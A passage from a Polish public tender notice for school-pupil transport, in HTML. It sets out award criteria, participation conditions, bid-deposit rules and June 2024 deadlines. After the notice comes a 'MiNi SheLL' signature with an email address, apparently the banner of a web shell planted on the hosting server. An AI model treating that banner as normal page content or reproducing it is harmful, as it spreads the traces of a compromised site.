mógł dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone<br/>oferty o takiej samej cenie, takiego samego czasu podstawienia pojazdu zastępczego w razie awarii, wezwie on Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę oraz nowy czas podstawienia. Wykonawcy,<br/>składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach oraz<br/>dłuższego czasu podstawienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w minutach w razie awarii pojazdu od wystąpienia awarii (CzP)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>a) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Wykonawca spełni warunek jeżeli wykaże, że posiada zezwolenie na wykonywanie zawodu przewoźnika drogowego<br/>wydane na podstawie Ustawy z dnia 6 września 2001 roku o transporcie drogowym (Dz. U. z 2021 r., poz. 919 z późn. zm.);<br/>Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art.<br/>112 ust. 2 pkt 2 ustawy Pzp zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane.<br/>c) sytuacji ekonomicznej lub finansowej: posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną równą:<br/>W przypadku składania ofert na Część I – min. 50 000,00 zł<br/>W przypadku składania ofert na Część II – min. 50 000,00 zł<br/>W przypadku składania ofert na Część III – min. 50 000,00 zł<br/>W przypadku składania ofert na Część IV – min. 50 000,00 zł<br/>W przypadku składania ofert na Część V – min. 50 000,00 zł<br/>d) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że dysponuje na czas realizacji zamówienia, aktualnie zarejestrowanymi, sprawnymi, posiadającymi aktualne przeglądy techniczne i ubezpieczenie, pojazdami w ilościach:<br/>- dla części: I, II, III, IV i V co najmniej po jednym oddzielnym pojeździe dla każdej z wymienionych części, przystosowanym do wykonywania przewozów uczniów (z zastrzeżeniem, że w przypadku awarii pojazdu zobligowany jest podstawić inny pojazd przystosowany do przewozów uczniów wraz <br/>z obsługą: kierowca i opiekun). <br/>- lub co najmniej 6 pojazdami przystosowanymi do wykonywania przewozów uczniów w przypadku składania oferty na wszystkie części.<br/>Pojazdy, o których mowa w punkcie d) muszą spełniać następujące minimalne wymagania w zakresie ilości miejsc:<br/>CZĘŚĆ I: Trasa 1 - 27; CZĘŚĆ II: Trasa 1 - 14; CZĘŚĆ III: Trasa 1, 2, 3 - 14; CZĘŚĆ IV: Trasa 1 - 34; CZĘŚĆ V: Trasa 1 - 22.<br/>Uwaga: podane ilości miejsc siedzących w pojazdach dotyczących poszczególnych części zawierają orientacyjne ilości miejsc do zapewnienia przez wykonawcę przewozów. Ze względu na trwającą rekrutację do przedszkola i szkoły i możliwość zgłoszenia do zamawiającego zwiększenia liczby uczniów przez rodziców i opiekunów prawnych w stosunku do stanu zgłoszonego w dniu ogłoszenia postępowania przetargowego, Zamawiający zastrzega sobie możliwość zgłoszenia do Wykonawcy zwiększenia większej liczby uczniów/dzieci do realizacji przewozów.<br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/><br/>UWAGA!<br/>Ze względu na ograniczoną liczbę znaków pełny opis zawarto w SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji<br/>2) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie z<br/>Załącznikiem nr 8 do SWZ. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,<br/>zamiast dokumentu, o którym mowa w pkt 1), składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma<br/>siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy.<br/><br/>UWAGA!<br/>Ze względu na ograniczoną liczbę znaków pełny opis zawarto w SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Na potwierdzenie spełnienia warunku udziału w postępowaniu dotyczącego uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, wykonawca dostarczy zezwolenie na wykonywanie zawodu przewoźnika drogowego, wydanego na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym.<br/>2) Na potwierdzenie spełnienia warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub finansowej, wykonawca dostarczy zamawiającemu dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia, w wysokości nie mniejszej niż kwota ustalona przez zamawiającego w warunkach udziału w postępowaniu, tj.:<br/>- dla części numer I – 50 000,00 zł<br/>- dla części numer II – 50 000,00 zł<br/>- dla części numer III – 50 000,00 zł<br/>- dla części numer IV – 50 000,00 zł<br/>- dla części numer V – 50 000,00 zł<br/>3) Na potwierdzenie spełnienia warunku udziału w postępowaniu dotyczącego zdolności technicznej, wykonawca dostarczy zamawiającemu wykaz posiadanych pojazdów, sporządzony zgodnie z<br/>Załącznikiem nr 5 do SWZ oraz dołączy dowody rejestracyjne posiadanych pojazdów przystosowanych do przewozów dzieci i<br/>uczniów, w których wskazano liczbę miejsc siedzących.<br/><br/>UWAGA!<br/>Ze względu na ograniczoną liczbę znaków pełny opis zawarto w SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę składa się na Formularzu Ofertowym – zgodnie z Załącznikiem nr 1 do SWZ. Wraz z ofertą Wykonawca jest<br/>zobowiązany złożyć:<br/>1) oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ;<br/>2) zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI ust. 3 SWZ (jeżeli dotyczy);<br/>3) dokumenty, o których mowa w Rozdziale XII SWZ (jeżeli dotyczy);<br/>4) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli dotyczy). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda wniesienia wadium dla każdej z części, w następującej wysokości:<br/>1) dla części I: 2000,00 zł<br/>2) dla części II: 1500,00 zł<br/>3) dla części III: 1500,00 zł<br/>4) dla części IV: 2000,00 zł<br/>5) dla części V: 1300,00 zł<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>3. W przypadku przedłużenia terminu związania ofertą przedłuża się okres ważności wadium albo, jeżeli jest to możliwe, wnosi nowe wadium na przedłużony okres związania ofertą.<br/>4. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>5. Wadium wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego nr 20 8851 0008<br/>2001 0000 0101 0004.<br/>6. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>7. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 ustawy Pzp,<br/>wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>8. Zamawiający zwróci wadium niezwłocznie, ale nie później niż 7 dni od dnia wystąpienia jednej z okoliczności: <br/>1) upływu terminu związania ofertą;<br/>2) zawarcia umowy w sprawie zamówienia publicznego;<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na<br/>czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>9. Zamawiający, niezwłocznie, nie później niż w terminie 7 dni od dnia złożenia wniosku zwróci wadium wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin jego wniesienia.<br/>10. Złożenie wniosku o zwrot wadium, o którym mowa ust. 9, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej.<br/>11. Zamawiający zwróci wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.<br/>12. Zamawiający zwróci wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>13. Zamawiający zatrzyma wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, wystąpi odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, jeżeli:...<br/><br/>UWAGA! Zamawiający nie mógł zamieścić kompletnego zapisu z uwagi na ograniczoną liczbę znaków. Pełna treść znajduje<br/>się w SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>3. Wykonawcy działający wspólnie mogą wykazać spełnianie warunku dotyczącego uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeżeli co najmniej jeden z nich posiada te uprawnienia i zrealizuje usługi, do których wykonania uprawnienia te są wymagane. W odniesieniu natomiast do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy działający wspólnie, mogą polegać na zdolnościach tych z wykonawców, którzy posiadają wymagane zdolności i faktycznie wykonają<br/>usługi.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy.<br/>5. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>6. Oświadczenie, o którym mowa w ust. 4, które zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem - przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z<br/>dokumentem w postaci papierowej.<br/>7. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, w przypadku oświadczenia, o którym mowa w ust. 4, dokonuje wykonawca wspólnie ubiegający się o udzielenie zamówienia. Powyższą regulację należy rozumieć w ten sposób, że poświadczenia<br/>zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej oświadczenia, o którym mowa w ust. 4 ust. mogą dokonać wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ale także jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia, który umocowany został do reprezentowania członków konsorcjum w<br/>postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym w projektowanych postanowieniach umowy, stanowiących Załącznik nr 6 do SWZ. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-06-14 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pomocą Platformy e-Zamówienia dostępnej pod adresem: https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-06-14 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-07-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com